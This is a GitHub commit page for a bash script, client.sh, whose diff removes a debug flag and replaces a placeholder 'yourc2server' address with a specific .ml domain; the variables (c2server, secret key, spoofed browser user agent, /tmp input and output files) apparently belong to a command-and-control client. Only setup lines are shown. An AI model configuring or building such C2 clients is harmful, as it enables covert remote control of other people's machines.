Skip to content

Commit

Permalink
remove debug flag
Browse files Browse the repository at this point in the history
  • Loading branch information
mthbernardes committed Dec 2, 2018
1 parent c2e3984 commit 88903c8
Showing 1 changed file with 2 additions and 2 deletions.
4 changes: 2 additions & 2 deletions client.sh
Original file line number Diff line number Diff line change
@@ -1,5 +1,5 @@
#!/bin/bash
set -x

if [ -z "$1" ]; then
echo -e "Error\nExecute: $0 secretkey-provided-by-the-server\n"
exit 1
Expand All @@ -8,7 +8,7 @@ fi
running=true
secretkey="$1"
user_agent="User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.110 Safari/537.36"
c2server="http://www.yourc2server.ml/?key=$secretkey"
c2server="http://www.dedonocuegritaria.ml/?key=$secretkey"
result=""
input="/tmp/input"
output="/tmp/output"
Expand Down

0 comments on commit 88903c8

Please sign in to comment.